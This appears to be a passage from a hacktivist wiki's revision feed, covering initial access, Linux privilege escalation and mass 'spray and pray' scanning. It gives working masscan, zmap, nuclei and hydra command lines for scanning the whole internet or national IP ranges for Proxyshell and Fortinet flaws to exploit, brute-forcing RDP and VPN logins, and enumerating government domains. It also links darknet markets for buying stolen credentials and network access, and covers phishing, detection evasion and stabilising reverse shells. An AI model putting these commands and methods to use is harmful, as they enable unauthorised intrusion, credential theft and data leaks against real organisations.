* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_Linux&amp;diff=1722</id>
		<title>Hacking Linux</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_Linux&amp;diff=1722"/>
		<updated>2024-03-21T12:40:41Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Tools */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Rooting == &lt;br /&gt;
These tools will quickly help you analyze a system for vulnerabilities that will aid in your privilege escalation and maintaining persistence.&lt;br /&gt;
&lt;br /&gt;
=== Tools ===&lt;br /&gt;
* LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS&lt;br /&gt;
* LinEnum: https://github.com/rebootuser/LinEnum&lt;br /&gt;
* LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester&lt;br /&gt;
* Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration&lt;br /&gt;
* Linux Priv Checker: https://github.com/linted/linuxprivchecker&lt;br /&gt;
* Nix* binary exploitation: https://gtfobins.github.io&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md Linux - Privilege Escalation]&lt;br /&gt;
* SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery: https://github.com/MegaManSec/SSH-Snake&lt;br /&gt;
&lt;br /&gt;
== Stabilizing Shells ==&lt;br /&gt;
After gaining a [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md reverse shell] it&#039;s good practice to stabilize it for better usability and functionality.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
python3 -c &#039;import pty;pty.spawn(&amp;quot;/bin/bash&amp;quot;);&#039;&lt;br /&gt;
stty -a&lt;br /&gt;
stty rows &amp;lt;NUMBER&amp;gt; cols &amp;lt;NUMBER&amp;gt;&lt;br /&gt;
echo $SHELL&lt;br /&gt;
export SHELL=bash&lt;br /&gt;
echo $TERM&lt;br /&gt;
export TERM=xterm-256color&lt;br /&gt;
press CTRL+Z&lt;br /&gt;
stty raw -echo ; fg&lt;br /&gt;
reset&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Evade Detection ==&lt;br /&gt;
For evading detection whilst you&#039;re hacking:&lt;br /&gt;
&lt;br /&gt;
See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md Linux - Evasion].&lt;br /&gt;
&lt;br /&gt;
== Linux Persistence ==&lt;br /&gt;
For persisting your access on a Linux system:&lt;br /&gt;
&lt;br /&gt;
See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md Linux - Persistence].&lt;br /&gt;
&lt;br /&gt;
General tips and tricks:&lt;br /&gt;
* Tips, Tricks &amp;amp; Hacks Cheat Sheet: https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Domain_Spray_and_Pray&amp;diff=1721</id>
		<title>Domain Spray and Pray</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Domain_Spray_and_Pray&amp;diff=1721"/>
		<updated>2024-03-21T11:38:36Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;To get a list of government domains (as an example) you can either masscan the internet using [https://github.com/zmap/zmap zmap] for port 443 and then proceed to grab banners and certificates using [https://github.com/zmap/zgrab2 zgrab] and then grep for &amp;lt;code&amp;gt;.gov&amp;lt;/code&amp;gt; TLDs or you can [https://kaeferjaeger.gay/?dir=sni-ip-ranges download a list of domains] from popular cloud providers (limiting) such as Amazon, Digital Ocean, Google, Microsoft and Oracle.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This is very loud and not recommended. However for large scale hacktivist operations where the operation seeks to target as much as possible in regards to specific TLDs or countries this method works quite well in regards to identifying low hanging fruit vulnerabilities. A more targeted penetration test against a target list will be much better and more effective.&lt;br /&gt;
&lt;br /&gt;
=== Mass Scanning ===&lt;br /&gt;
If you don&#039;t want to limit your scan by cloud providers and you want to get more coverage for domains you can use both [https://github.com/zmap/zmap zmap] and [https://github.com/zmap/zgrab2 zgrab] to port scan and download SSL/TLS certificate data to then grep for domains. A lot of organizations suffer from shadow IT and dont have great insights into the assets they own and are exposed. We can exploit this with mass spray and pray campaigns.&lt;br /&gt;
&lt;br /&gt;
==== Zmap ====&lt;br /&gt;
Scan the internets IPV4 space for port 443:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/zmap/zmap zmap] -p 443 -o targets.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Zgrab ====&lt;br /&gt;
Using zmaps output as input now download the certificate data:&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/zmap/zgrab2 zgrab2] tls --input-file=targets.txt --output-file=certs.json&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
After which you will want to parse the output for government top level domains ([https://en.wikipedia.org/wiki/List_of_Internet_top-level_domains or other]):&lt;br /&gt;
* &amp;lt;code&amp;gt;grep -E -o &#039;[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})&#039; certs.json &amp;gt; domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
** &amp;lt;code&amp;gt;grep -i &#039;\.gov$&#039; domains.txt &amp;gt; gov_domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cloud Domains ===&lt;br /&gt;
To begin, download all of the cloud providers text files and parse them.&lt;br /&gt;
&lt;br /&gt;
* https://kaeferjaeger.gay/?dir=sni-ip-ranges&lt;br /&gt;
&lt;br /&gt;
Output all cloud provider text files into one big file:&lt;br /&gt;
* &amp;lt;code&amp;gt;user@host:~/sni_ip_ranges$ cat *.txt &amp;gt; all.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Parse all.txt for domains:&lt;br /&gt;
* &amp;lt;code&amp;gt;grep -E -o &#039;[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})&#039; ~/sni_ip_ranges/all.txt &amp;gt; domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grep specifically for your targets TLDs:&lt;br /&gt;
* &amp;lt;code&amp;gt;grep -i &#039;\.gov$&#039; domains.txt &amp;gt; gov_domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enumerate Subdomains ===&lt;br /&gt;
To be thorough in our scanning we will enumerate all the domains in the domains.txt file for their subdomains to ensure complete coverage (nuclei will filter duplicates).&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/subfinder subfinder] -dL gov_domains.txt -o government_domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Port scan ===&lt;br /&gt;
To ensure a thorough vulnerability scan we will want to port scan our targets for their open ports to ensure we scan all their services.&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/naabu naabu] -l government_domains.txt -o government_domains_final.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Scan ===&lt;br /&gt;
Finally we vulnerability scan the targeted domains to later exploit.&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l government_domains_final.txt -s critical,high -o vuln_gov_domains.txt&amp;lt;/code&amp;gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1667</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1667"/>
		<updated>2023-10-22T10:34:54Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Vulnerability Scanning */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and emails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
